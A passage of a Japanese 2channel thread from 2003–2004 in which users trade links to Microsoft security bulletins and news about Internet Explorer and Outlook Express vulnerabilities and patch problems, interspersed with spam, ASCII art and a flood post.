599 :名無しさん@お腹いっぱい。:03/07/31 17:06
http://altba.com/bakera/hatomaru.aspx/ebi/genre/00490045
>XML の CDATA 区間の中に object を書かれると、何故か「マイコンピュータ」ゾーンの
>セキュリティレベルで実行されてしまうようです
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2002/03.html#20020301_ie
これってもう対策されたんだっけ?
>XML の CDATA 区間の中に object を書かれると、何故か「マイコンピュータ」ゾーンの
>セキュリティレベルで実行されてしまうようです
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2002/03.html#20020301_ie
これってもう対策されたんだっけ?
600 :名無しさん@お腹いっぱい。:03/07/31 20:53
600げっっとーーーーーおぉ!!
601 :ぼるじょあ ◆yBEncckFOU :03/08/02 04:50
∧_∧ ∧_∧
ピュ.ー ( ・3・) ( ^^ ) <これからも僕たちを応援して下さいね(^^)。
=〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
= ◎――――――◎ 山崎渉&ぼるじょあ
ピュ.ー ( ・3・) ( ^^ ) <これからも僕たちを応援して下さいね(^^)。
=〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
= ◎――――――◎ 山崎渉&ぼるじょあ
602 :名無しさん@お腹いっぱい。:03/08/03 01:34
hage
603 :名無しさん@お腹いっぱい。:03/08/05 17:03
604 :名無しさん@お腹いっぱい。:03/08/13 14:14
いろいろ読ませてもらったけど、つまるところ
OEであれIEコンポーネント使用メーラーであれ、
IEと連携しないように、すべてのメッセージをテキスト形式で受信すれば
何ら問題ないわけですね。
OEであれIEコンポーネント使用メーラーであれ、
IEと連携しないように、すべてのメッセージをテキスト形式で受信すれば
何ら問題ないわけですね。
605 :名無しさん@お腹いっぱい。:03/08/13 15:17
>>604
違う。セキュリティホールを考慮してない。
違う。セキュリティホールを考慮してない。
606 :名無しさん@お腹いっぱい。:03/08/15 11:21
すべてテキスト形式で受信するなら
IEコンポーネントいらないじゃん
IEコンポーネントいらないじゃん
607 :名無しさん@お腹いっぱい。:03/08/15 20:12
608 :名無しさん@お腹いっぱい。:03/08/15 20:34
>>607
メーラー作者は(゚д゚)ウマーか
メーラー作者は(゚д゚)ウマーか
(⌒V⌒)
│ ^ ^ │<これからも僕を応援して下さいね(^^)。
⊂| |つ
(_)(_) 山崎パン
│ ^ ^ │<これからも僕を応援して下さいね(^^)。
⊂| |つ
(_)(_) 山崎パン
610 :ぼるじょあ ◆yBEncckFOU :03/08/17 22:27
(・3・) エェー
611 :名無しさん@お腹いっぱい。:03/08/21 14:08
612 :名無しさん@お腹いっぱい。:03/09/06 01:28
Windows XP Service Pack 1 適用のお願い
- Windows XP 初期出荷版(SP1 未適用製品)向け修正プ ログラム提供終了のお知らせ
更新日: 2003 年 9 月 5 日
http://www.microsoft.com/japan/windowsxp/endofgold.asp
- Windows XP 初期出荷版(SP1 未適用製品)向け修正プ ログラム提供終了のお知らせ
更新日: 2003 年 9 月 5 日
http://www.microsoft.com/japan/windowsxp/endofgold.asp
613 :名無しさん@お腹いっぱい。:03/09/11 10:19
○「MS03-039: RPCSS サービスのバッファ オーバーランによりコードが実行され
る (824146)」
http://www.microsoft.com/japan/technet/security/bulletin/MS03-039ov.asp
○Internet Explorer 用の累積的な修正プログラム (822925) (MS03-032)
http://www.microsoft.com/japan/technet/security/bulletin/ms03-032.asp
今回の更新内容
このセキュリティ情報ページを更新し、このセキュリティ情報で提供された
修正プログラムが 「オブジェクト タグの脆弱性」 (CAN-2003-0532) を適切に
修正しないという報告についての情報を追加しました。
○Windows カーネル メッセージ処理のバッファ オーバーランにより、
権限が昇格する (811493) (MS03-013)
http://www.microsoft.com/japan/technet/security/bulletin/ms03-013.asp
○RPC インターフェイスのバッファ オーバーランによりコードが実行される
(823980) (MS03-026)
http://www.microsoft.com/japan/technet/security/bulletin/ms03-026.asp
る (824146)」
http://www.microsoft.com/japan/technet/security/bulletin/MS03-039ov.asp
○Internet Explorer 用の累積的な修正プログラム (822925) (MS03-032)
http://www.microsoft.com/japan/technet/security/bulletin/ms03-032.asp
今回の更新内容
このセキュリティ情報ページを更新し、このセキュリティ情報で提供された
修正プログラムが 「オブジェクト タグの脆弱性」 (CAN-2003-0532) を適切に
修正しないという報告についての情報を追加しました。
○Windows カーネル メッセージ処理のバッファ オーバーランにより、
権限が昇格する (811493) (MS03-013)
http://www.microsoft.com/japan/technet/security/bulletin/ms03-013.asp
○RPC インターフェイスのバッファ オーバーランによりコードが実行される
(823980) (MS03-026)
http://www.microsoft.com/japan/technet/security/bulletin/ms03-026.asp
614 :名無しさん@お腹いっぱい。:03/09/11 13:34
IEのパッチに問題発覚,適用しても解消で きないセキュリティ・ホールが存在
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030909/1/
Windowsにまたもや“超特大”のセキュリ ティ・ホール,すぐにWindows Updateの実施を
第2,第3の「Blaster」ワームが出現する恐れあり
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030911/1/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030909/1/
Windowsにまたもや“超特大”のセキュリ ティ・ホール,すぐにWindows Updateの実施を
第2,第3の「Blaster」ワームが出現する恐れあり
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030911/1/
615 :名無しさん@お腹いっぱい。:03/09/13 21:57
致命的な奴が8つも追加…
http://www.pivx.com/larholm/unpatched/
http://www.pivx.com/larholm/unpatched/
616 :名無しさん@お腹いっぱい。:03/09/20 00:57
2年前の脆弱性を突いた新ウイルスが拡散
http://www.zdnet.co.jp/enterprise/0309/19/epn03.html
W32.Swen.A@mm
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
WORM_SWEN.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SWEN.A&VSect=T
W32/Swen@MM
http://www.nai.com/japan/security/virS.asp?v=W32/Swen@MM
http://www.zdnet.co.jp/enterprise/0309/19/epn03.html
W32.Swen.A@mm
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
WORM_SWEN.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SWEN.A&VSect=T
W32/Swen@MM
http://www.nai.com/japan/security/virS.asp?v=W32/Swen@MM
617 :名無しさん@お腹いっぱい。:03/10/04 19:10
MS03-040: Internet Explorer 用の累積的な修正プログラム (828750)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-040ov.asp
http://www.microsoft.com/japan/technet/security/bulletin/MS03-040ov.asp
618 :名無しさん@お腹いっぱい。:03/10/05 23:26
マイクロソフト、IE 5.01以後が対象の緊急の脆弱性「MS03-040」
http://internet.watch.impress.co.jp/cda/news/2003/10/04/654.html
米MS、とんだお粗末-重大な脆弱性用のパッチが役に立たず
http://japan.cnet.com/news/ent/story/0,2000047623,20060815,00.htm
http://internet.watch.impress.co.jp/cda/news/2003/10/04/654.html
米MS、とんだお粗末-重大な脆弱性用のパッチが役に立たず
http://japan.cnet.com/news/ent/story/0,2000047623,20060815,00.htm
619 :名無しさん@お腹いっぱい。:03/10/06 17:07
IEに危険なセキュリティ・ホール,
WebページやHTMLメールを見るだけで被害を受ける
今回の累積パッチでは,過去のパッチでふさげなかった
セキュリティ・ホールも修正
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20031005/135316/
WebページやHTMLメールを見るだけで被害を受ける
今回の累積パッチでは,過去のパッチでふさげなかった
セキュリティ・ホールも修正
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20031005/135316/
620 :名無しさん@お腹いっぱい。:03/10/17 09:20
後を絶たないIEのセキュリティ・ホール,設定変更などで“自衛”を
続々見つかるパッチの不具合,パッチ未公開のホールを狙うウイルスも
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20031014/1/
続々見つかるパッチの不具合,パッチ未公開のホールを狙うウイルスも
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20031014/1/
621 :名無しさん@お腹いっぱい。:03/10/29 12:01
「ネットにつなぐだけで攻撃を受ける」――第三の“超特大”セキュリティ・ホールを解説する
Exploitが既に公開,パッチを適用してもメッセンジャ サービスは無効に
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20031028/1/
IE/OEと関係ないのでsage
Exploitが既に公開,パッチを適用してもメッセンジャ サービスは無効に
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20031028/1/
IE/OEと関係ないのでsage
622 :名無しさん@お腹いっぱい。:03/11/08 06:27
IEを起動するとthesten.comという外国のアダルトサイトがホームページになっていて、
お気に入りに3つのそのサイトへのリンクが毎回入っています。
履歴やクッキーやゴミ箱の内容など全て消去しても絶対に起動したときに表示されます。
どのたか改善方法を教えてください。
お気に入りに3つのそのサイトへのリンクが毎回入っています。
履歴やクッキーやゴミ箱の内容など全て消去しても絶対に起動したときに表示されます。
どのたか改善方法を教えてください。
623 :((((((;゚Д゚))))))ガクガクブルブル :03/11/08 08:10
http://pc2.2ch.net/test/read.cgi/pcqa/1067657959/
>>622
ここ逝こうね。
それと、ここで質問する前に、
最低限1から書かれているFAQとか読んで、
書かれていること実行してみて、だめだったら
質問したほうがいいよ。それと、これ、マルチじゃないよね
>>622
ここ逝こうね。
それと、ここで質問する前に、
最低限1から書かれているFAQとか読んで、
書かれていること実行してみて、だめだったら
質問したほうがいいよ。それと、これ、マルチじゃないよね
624 :名無しさん@お腹いっぱい。:03/11/12 02:57
Internet Explorer 用の累積的な修正プログラム (828750) (MS03-040)
最大深刻度 :緊急
影響を受けるソフトウェア :
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6
Microsoft Internet Explorer 6 for Windows Server 2003
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms03-040.asp
最大深刻度 :緊急
影響を受けるソフトウェア :
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6
Microsoft Internet Explorer 6 for Windows Server 2003
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms03-040.asp
625 :名無しさん@お腹いっぱい。:03/11/12 03:03
↑ミス
Internet Explorer 6 SP1 用の累積的な修正プログラム (KB824145)
が出ているので、各自WindowsUpdateされたし。
現時点ではTechNetに情報なし。
Internet Explorer 6 SP1 用の累積的な修正プログラム (KB824145)
が出ているので、各自WindowsUpdateされたし。
現時点ではTechNetに情報なし。
626 :SMTP信号機:03/11/12 03:06
サーバ関連情報レジストリがばれている限り貴方のPCに侵入した自己散布型ウイルスは自分を撒き散らします。
かといってOEの類を使うのを止めるのはしゃくですよね?
だから作りました。
貴方のPCが迷惑メール送信の加害者にならない為に・・・
http://homepage3.nifty.com/tokeon/Eng-B/SMTPmv.html
JavaですからLinuxPCでも動くには動きます。
かといってOEの類を使うのを止めるのはしゃくですよね?
だから作りました。
貴方のPCが迷惑メール送信の加害者にならない為に・・・
http://homepage3.nifty.com/tokeon/Eng-B/SMTPmv.html
JavaですからLinuxPCでも動くには動きます。
627 :名無しさん@お腹いっぱい。:03/11/12 14:27
IEに「緊急」のセキュリティ・ホール,マイクロソフトは累積パッチを公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20031112/136355/
MS、WindowsとOfficeの脆弱性修正パッチリリース
http://www.zdnet.co.jp/enterprise/0311/12/epn05.html
米マイクロソフト、米祝日にセキュリティパッチをリリース
http://japan.cnet.com/news/ent/story/0,2000047623,20061917,00.htm
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20031112/136355/
MS、WindowsとOfficeの脆弱性修正パッチリリース
http://www.zdnet.co.jp/enterprise/0311/12/epn05.html
米マイクロソフト、米祝日にセキュリティパッチをリリース
http://japan.cnet.com/news/ent/story/0,2000047623,20061917,00.htm
628 :名無しさん@お腹いっぱい。:03/11/12 14:30
MS03-048 - Internet Explorer 用の累積的なセキュリティ更新 (824145)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-048.asp
●影響を受けるソフトウェア
・Microsoft Windows 98 Second Edition
・Microsoft Windows Millennium Edition
・Microsoft Windows NT Workstation 4.0
・Microsoft Windows NT Server 4.0
・Microsoft Windows NT Server 4.0, Terminal Server Edition
・Microsoft Windows 2000
・Microsoft Windows XP
・Microsoft Windows XP 64 bit Edition
・Microsoft Windows XP 64 bit Edition Version 2003
・Microsoft Windows Server 2003
・Microsoft Windows Server 2003 64 bit Edition
●影響
リモートからのコード実行
http://www.microsoft.com/japan/technet/security/bulletin/MS03-048.asp
●影響を受けるソフトウェア
・Microsoft Windows 98 Second Edition
・Microsoft Windows Millennium Edition
・Microsoft Windows NT Workstation 4.0
・Microsoft Windows NT Server 4.0
・Microsoft Windows NT Server 4.0, Terminal Server Edition
・Microsoft Windows 2000
・Microsoft Windows XP
・Microsoft Windows XP 64 bit Edition
・Microsoft Windows XP 64 bit Edition Version 2003
・Microsoft Windows Server 2003
・Microsoft Windows Server 2003 64 bit Edition
●影響
リモートからのコード実行
629 :名無しさん@お腹いっぱい。:03/11/12 14:40
630 :名無しさん@お腹いっぱい。:03/11/12 14:57
631 :名無しさん@お腹いっぱい。:03/11/12 19:17
q824145.exe /q:a /r:n
これも出来たとはな (´ー`) フッ
これも出来たとはな (´ー`) フッ
632 :名無しさん@お腹いっぱい。:03/11/12 19:17
誤爆したぜ
633 :名無しさん@お腹いっぱい。:03/11/19 19:53
IEにパッチを当てるとスクロール操作に不具合,パッチの品質に改めて注意が必要
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20031118/1/
スクロールバーの空白部分をクリックすると画面スクロールが正しく行われない
http://support.microsoft.com/default.aspx?scid=kb;ja;832270
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20031118/1/
スクロールバーの空白部分をクリックすると画面スクロールが正しく行われない
http://support.microsoft.com/default.aspx?scid=kb;ja;832270
634 :名無しさん@お腹いっぱい。:03/11/29 20:24
IEに複数のセキュリティ・ホール,対策はアクティブスクリプトを無効にすること
ホールを突くデモ・ページが公開中,最新パッチを適用していても影響を受ける
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20031128/136983/
ホールを突くデモ・ページが公開中,最新パッチを適用していても影響を受ける
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20031128/136983/
635 :名無しさん@お腹いっぱい。:03/11/30 01:40
Internet Explorer System Compromise Vulnerabilities
http://secunia.com/advisories/10289/
Internet Explorerの新セキュリティホールは「極めて危険」
http://www.zdnet.co.jp/enterprise/0311/26/epi02.html
Opera:特定のMIMEタイプを持つデータがユーザーに無許可でダウンロード・実行される問題
http://jp.opera.com/cgi-bin/supsearch2.cgi?options=index&name=j104
http://secunia.com/advisories/10289/
Internet Explorerの新セキュリティホールは「極めて危険」
http://www.zdnet.co.jp/enterprise/0311/26/epi02.html
Opera:特定のMIMEタイプを持つデータがユーザーに無許可でダウンロード・実行される問題
http://jp.opera.com/cgi-bin/supsearch2.cgi?options=index&name=j104
636 :名無しさん@お腹いっぱい。:03/11/30 01:57
最近のウイルス対策製品も IE の御世話になってるもの多い感じだけど
どうなの?
どうなの?
637 :名無しさん@お腹いっぱい。:03/11/30 03:25
> 最近のウイルス対策製品も IE の御世話になってるもの多い感じだけど
> どうなの?
まぁ、Windows自体に依存してるからね…。
WindowsがIEにも依存してるし。 <= help等
> どうなの?
まぁ、Windows自体に依存してるからね…。
WindowsがIEにも依存してるし。 <= help等
638 :636:03/11/30 03:44
>> 637
そうだねー。でも OS が web browser に依存しているというのは。
完全に逆なんじゃないのかなあ?
少なくともセキュリティー関連のものは独自の仕組で
アップデートとか出来た方が安心だと思うのは間違いだろうか。
だからといって完璧ではないだろうけど、若干ましな気がする。
そうだねー。でも OS が web browser に依存しているというのは。
完全に逆なんじゃないのかなあ?
少なくともセキュリティー関連のものは独自の仕組で
アップデートとか出来た方が安心だと思うのは間違いだろうか。
だからといって完璧ではないだろうけど、若干ましな気がする。
639 :名無しさん@お腹いっぱい。:03/12/03 14:31
IEを使い続けるリスクを再認識しよう
パッチには複数の不具合,パッチ未公開のセキュリティ・ホールが続出
今週のSecurity Check [Windows編] (第108回,2003年12月3日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20031202/1/
パッチには複数の不具合,パッチ未公開のセキュリティ・ホールが続出
今週のSecurity Check [Windows編] (第108回,2003年12月3日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20031202/1/
640 :名無しさん@お腹いっぱい。:03/12/11 21:36
IEにURLを偽装できるパッチ未公開の脆弱性が発見される
〜緊急度が低いため、パッチはまだリリースしない(MS取締役東氏)
http://internet.watch.impress.co.jp/cda/news/2003/12/11/1451.html
〜緊急度が低いため、パッチはまだリリースしない(MS取締役東氏)
http://internet.watch.impress.co.jp/cda/news/2003/12/11/1451.html
641 :名無しさん@お腹いっぱい。:03/12/11 21:40
>>640
ちなみに、Opera7.23ja(3226)だとセキュリティ警告のダイアローグが出る。
ちなみに、Opera7.23ja(3226)だとセキュリティ警告のダイアローグが出る。
642 :名無しさん@お腹いっぱい。:03/12/12 18:06
IEにURLを偽装できるセキュリティ・ホール,安易なクリックは禁物
セキュリティ・ホールを確認するWebページやHTMLメールが公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20031211/137400/
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2003/12.html#20031211_IE
セキュリティ・ホールを確認するWebページやHTMLメールが公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20031211/137400/
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2003/12.html#20031211_IE
643 :名無しさん@お腹いっぱい。:03/12/12 18:52
644 :こここ:03/12/13 21:38
JokeVirusってどうやって解除するんですか?
645 :名無しさん@お腹いっぱい。:03/12/20 03:18
@impoでcss読み込んじゃうなんて何考えてんだろうな
646 :名無しさん@お腹いっぱい。:03/12/26 06:41
こんにちは。MLM・NB初心者です。
詳しい方や現在もしくは過去MLM・NBをやられていた方の
ご意見が聞きたくてページ作りました。
よろしくお願いします。
つまらない物ですが、お礼の品も用意しておりますので
ぜひ、どうぞ!
http://gonbea.fc2web.com/
647 :名無しさん@お腹いっぱい。:04/01/10 22:26
IEに2種類の新たなセキュリティ・ホールが見つかる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040110/138152/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040110/138152/
648 :名無しさん@お腹いっぱい。:04/01/14 23:22
月例パッチに含まれなかったIEの複数の脆弱性
http://www.itmedia.co.jp/enterprise/0401/14/epn15.html
http://www.itmedia.co.jp/enterprise/0401/14/epn15.html
649 :名無しさん@お腹いっぱい。:04/01/21 18:24
解消されない“URLの偽装問題”,1月もIEのパッチは公開されず
Mozillaは最新版で対応完了,MDACのセキュリティ・ホールにも注意
今週のSecurity Check [Windows編] (第110回,2004年1月21日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20040120/1/
Mozillaは最新版で対応完了,MDACのセキュリティ・ホールにも注意
今週のSecurity Check [Windows編] (第110回,2004年1月21日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20040120/1/
650 :名無しさん@お腹いっぱい。:04/01/28 19:48
URL偽装にご注意を!―Symantecのウイルス研究者が警告
http://itpro.nikkeibp.co.jp/free/NBY/NEWS/20040128/138984/
http://itpro.nikkeibp.co.jp/free/NBY/NEWS/20040128/138984/
651 :名無しさん@お腹いっぱい。:04/01/28 20:53
Microsoft plans to release a software update that modifies
the default behavior of Internet Explorer for handling user
information in HTTP and HTTPS URLs
http://support.microsoft.com/default.aspx?scid=kb;[LN];834489
the default behavior of Internet Explorer for handling user
information in HTTP and HTTPS URLs
http://support.microsoft.com/default.aspx?scid=kb;[LN];834489
652 :名無しさん@お腹いっぱい。:04/01/30 18:33
IEに,ダウンロードするファイル名を偽装されるセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040129/139103/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040129/139103/
653 :名無しさん@お腹いっぱい。:04/02/01 15:55
>>652
もうなんでもありでつね
もうなんでもありでつね
654 :名無しさん@お腹いっぱい。:04/02/02 00:38
IEもうだめぽ
655 :名無しさん@お腹いっぱい。:04/02/03 04:14
レベル緊急。
MS04-004 - Internet Explorer 用の累積的なセキュリティ修正プログラム (832894)
MS04-004 - Internet Explorer 用の累積的なセキュリティ修正プログラム (832894)
656 :名無しさん@お腹いっぱい。:04/02/03 10:05
Internet Explorer 用の累積的なセキュリティ修正プログラム (832894) (MS04-004)
http://www.microsoft.com/japan/technet/security/bulletin/ms04-004.asp
2004 年 2 月のセキュリティ情報 (Windows)
http://www.microsoft.com/japan/technet/security/bulletin/winfeb04.asp
http://www.microsoft.com/japan/technet/security/bulletin/ms04-004.asp
2004 年 2 月のセキュリティ情報 (Windows)
http://www.microsoft.com/japan/technet/security/bulletin/winfeb04.asp
657 :名無しさん@お腹いっぱい。:04/02/03 10:08
>>656
影響を受けるソフトウェア :
Microsoft Windows NTR Workstation 4.0 Service Pack 6a
Microsoft Windows NT Server 4.0 Service Pack 6a
Microsoft Windows NT Server 4.0 Terminal Server Edition, Service Pack 6
Microsoft Windows 2000 Service Pack 2, Service Pack 3, Service Pack 4
Microsoft Windows XP, Microsoft Windows XP Service Pack 1
Microsoft Windows XP 64-Bit Edition, Microsoft Windows XP 64-Bit Edition Service Pack 1
Microsoft Windows XP 64-Bit Edition Version 2003
Microsoft Windows ServerR 2003
Microsoft Windows Server 2003, 64-Bit Edition
テストした Microsoft Windows および Officeコンポーネント :
Internet Explorer 6 Service Pack 1
Internet Explorer 6 Service Pack 1 (64-Bit Edition)
Internet Explorer 6 Service Pack 1 for Windows Server 2003
Internet Explorer 6 Service Pack 1 for Windows Server 2003 (64-Bit Edition)
Internet Explorer 6
Internet Explorer 5.5 Service Pack 2
Internet Explorer 5.01 Service Pack 4
影響を受けるソフトウェア :
Microsoft Windows NTR Workstation 4.0 Service Pack 6a
Microsoft Windows NT Server 4.0 Service Pack 6a
Microsoft Windows NT Server 4.0 Terminal Server Edition, Service Pack 6
Microsoft Windows 2000 Service Pack 2, Service Pack 3, Service Pack 4
Microsoft Windows XP, Microsoft Windows XP Service Pack 1
Microsoft Windows XP 64-Bit Edition, Microsoft Windows XP 64-Bit Edition Service Pack 1
Microsoft Windows XP 64-Bit Edition Version 2003
Microsoft Windows ServerR 2003
Microsoft Windows Server 2003, 64-Bit Edition
テストした Microsoft Windows および Officeコンポーネント :
Internet Explorer 6 Service Pack 1
Internet Explorer 6 Service Pack 1 (64-Bit Edition)
Internet Explorer 6 Service Pack 1 for Windows Server 2003
Internet Explorer 6 Service Pack 1 for Windows Server 2003 (64-Bit Edition)
Internet Explorer 6
Internet Explorer 5.5 Service Pack 2
Internet Explorer 5.01 Service Pack 4
658 :名無しさん@お腹いっぱい。:04/02/03 10:17
>>657
Windows 98(SE),Windows Meがないのは、影響がないのではなくて、
サポート終了に伴い評価の対象外になったため。
http://www.microsoft.com/japan/win98/98meExtend.htm
http://www.microsoft.com/japan/win98/98meextendfaq.htm
(有償サポート契約を結んでいない一般ユーザは、
03年12月31日で98/Meのサポートは終了。)
Windows 98(SE),Windows Meがないのは、影響がないのではなくて、
サポート終了に伴い評価の対象外になったため。
http://www.microsoft.com/japan/win98/98meExtend.htm
http://www.microsoft.com/japan/win98/98meextendfaq.htm
(有償サポート契約を結んでいない一般ユーザは、
03年12月31日で98/Meのサポートは終了。)
659 :名無しさん@お腹いっぱい。:04/02/03 11:11
>>658
>>657には98SE,MEはあがってないけど、個別のパッチのところには
98SE、MEもあがっていて適用可能だね。
http://www.microsoft.com/downloads/details.aspx?FamilyId=70530968-B59A-47C0-90D3-0C884910BC97&displaylang=ja
>システム要件
>サポートされているオペレーティング システム : Windows 2000 Service Pack 2, Windows 2000 Service Pack 3,
>Windows 2000 Service Pack 4, Windows 98, Windows 98 Second Edition, Windows ME, Windows NT, Windows XP
>この修正プログラムは、次のオペレーティング システム用の Internet Explorer に対して適用されます。
>Windows XP SP1
>Windows XP
>Windows Millennium Edition (Windows Me)
>Windows 2000 SP2
>Windows 2000 SP3
>Windows 2000 SP4
>Windows 98 SE
>Windows NT 4.0 SP6A
>>657には98SE,MEはあがってないけど、個別のパッチのところには
98SE、MEもあがっていて適用可能だね。
http://www.microsoft.com/downloads/details.aspx?FamilyId=70530968-B59A-47C0-90D3-0C884910BC97&displaylang=ja
>システム要件
>サポートされているオペレーティング システム : Windows 2000 Service Pack 2, Windows 2000 Service Pack 3,
>Windows 2000 Service Pack 4, Windows 98, Windows 98 Second Edition, Windows ME, Windows NT, Windows XP
>この修正プログラムは、次のオペレーティング システム用の Internet Explorer に対して適用されます。
>Windows XP SP1
>Windows XP
>Windows Millennium Edition (Windows Me)
>Windows 2000 SP2
>Windows 2000 SP3
>Windows 2000 SP4
>Windows 98 SE
>Windows NT 4.0 SP6A
660 :名無しさん@お腹いっぱい。:04/02/03 22:33
今回のパッチは良く考えてからインスコした方が良さげ
スクロールはかちゅにも影響してるので直したいのだがw
スクロールはかちゅにも影響してるので直したいのだがw
661 :名無しさん@お腹いっぱい。:04/02/03 23:34
IE 6の最新パッチにトラブル,記憶させたパスワードが表示されなくなる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040203/139279/
MS04-004 Internet Explorer 6 Service Pack 1 用セキュリティ問題の累積的な修正プログラム
(KB832894)の適用後、記憶したはずのユーザー名とパスワードが表示されなくなる
ttp://support.microsoft.com/default.aspx?scid=http://www.microsoft.com/japan/support/sokuho/default.asp#Record_94
マイクロソフト,IEのセキュリティ・パッチを緊急リリース
URLの“偽装問題”を含む,3種類のセキュリティ・ホールを解消
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040203/139235/
MS、IEの脆弱性に対応の臨時パッチ
http://www.itmedia.co.jp/enterprise/0402/03/epc03.html
IE用の新パッチ発行で電子商取引に混乱の可能性も
http://www.itmedia.co.jp/enterprise/0402/02/epic01.html
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040203/139279/
MS04-004 Internet Explorer 6 Service Pack 1 用セキュリティ問題の累積的な修正プログラム
(KB832894)の適用後、記憶したはずのユーザー名とパスワードが表示されなくなる
ttp://support.microsoft.com/default.aspx?scid=http://www.microsoft.com/japan/support/sokuho/default.asp#Record_94
マイクロソフト,IEのセキュリティ・パッチを緊急リリース
URLの“偽装問題”を含む,3種類のセキュリティ・ホールを解消
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040203/139235/
MS、IEの脆弱性に対応の臨時パッチ
http://www.itmedia.co.jp/enterprise/0402/03/epc03.html
IE用の新パッチ発行で電子商取引に混乱の可能性も
http://www.itmedia.co.jp/enterprise/0402/02/epic01.html
662 :名無しさん@お腹いっぱい。:04/02/04 01:59
そもそもブラウザに記録させるようなPASSに、
PASSの意味はあるのかあと小一時間は問い詰めない。
PASSの意味はあるのかあと小一時間は問い詰めない。
663 :名無しさん@お腹いっぱい。:04/02/04 02:13
>>662ワラタ。
664 :名無しさん@お腹いっぱい。:04/02/05 21:56
665 :名無しさん@お腹いっぱい。:04/02/05 22:40
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
666 :名無しさん@お腹いっぱい。:04/02/09 00:42
↓IEの脆弱の部分 下記のソフトで補うことが出来るんだろうか?
このソフト使っている人いたら 教えてね
BB de!!スマートブラウジング Ver.1
このソフト使っている人いたら 教えてね
BB de!!スマートブラウジング Ver.1
667 :名無しさん@お腹いっぱい。:04/02/11 21:07
Opinion:IE臨時パッチをめぐる混乱はなぜ起きたのか
http://www.itmedia.co.jp/enterprise/0402/10/epc17.html
http://www.itmedia.co.jp/enterprise/0402/10/epc17.html
668 :名無しさん@お腹いっぱい。:04/02/18 11:27
漏えいしたWindowsのソースコードから早くもIE 5の脆弱性が発見される
〜リモートから任意のコードを実行可能。IE 6は影響なし
http://internet.watch.impress.co.jp/cda/news/2004/02/17/2118.html
マイクロソフト、複数の脆弱性を攻撃する手口が公開されていると警告
http://internet.watch.impress.co.jp/cda/news/2004/02/17/2125.html
〜リモートから任意のコードを実行可能。IE 6は影響なし
http://internet.watch.impress.co.jp/cda/news/2004/02/17/2118.html
マイクロソフト、複数の脆弱性を攻撃する手口が公開されていると警告
http://internet.watch.impress.co.jp/cda/news/2004/02/17/2125.html
669 :名無しさん@お腹いっぱい。:04/02/18 11:34
流出したWindowsのソース・コードでIE 5のセキュリティ・ホールが見つかる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040217/139945/
攻撃コードが既に出現,Windowsの“超特大”級セキュリティ・ホールを解説する
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20040217/1/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040217/139945/
攻撃コードが既に出現,Windowsの“超特大”級セキュリティ・ホールを解説する
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20040217/1/
670 :名無しさん@お腹いっぱい。:04/02/18 16:13
ソースコード流出がきっかけで指摘された新たなIEの脆弱性、その影響は?
Windows 2000とWindows NT 4のソースコードの一部がインターネットに流出したことが
明らかになってからわずか2日後、そのコードを元に、Internet Explorerの新たな脆弱
性が指摘された。
http://www.itmedia.co.jp/enterprise/0402/18/epn03.html
Windows 2000とWindows NT 4のソースコードの一部がインターネットに流出したことが
明らかになってからわずか2日後、そのコードを元に、Internet Explorerの新たな脆弱
性が指摘された。
